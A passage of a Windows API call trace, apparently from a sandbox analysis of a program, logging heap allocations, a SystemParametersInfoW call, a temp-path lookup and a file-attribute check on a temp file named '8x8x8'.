hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0271.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0271.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0271.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0271.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0271.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0271.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0271.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0271.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0271.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0271.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0271.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0271.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0271.582] LoadLibraryW (lpLibFileName="user32.dll") returned 0x750c0000 [0271.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0271.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0271.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0271.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x16) returned 0x2e69b68 [0271.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2e69b68, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0271.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0271.583] GetProcAddress (hModule=0x750c0000, lpProcName="SystemParametersInfoW") returned 0x750ef210 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0271.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0271.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0271.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0271.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0271.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0271.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0271.584] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0271.586] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0271.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0271.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0271.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0271.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0271.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0271.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0271.588] FreeLibrary (hLibModule=0x750c0000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0271.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0271.589] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0271.589] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0271.589] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0271.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0271.590] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0271.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0271.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0271.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f15178 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0271.591] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0271.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0271.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0271.592] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0271.592] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0271.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0271.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0271.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0271.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0271.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0271.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0271.592] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0271.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0271.593] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0271.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0271.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0271.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0271.593] HeapFree (in: 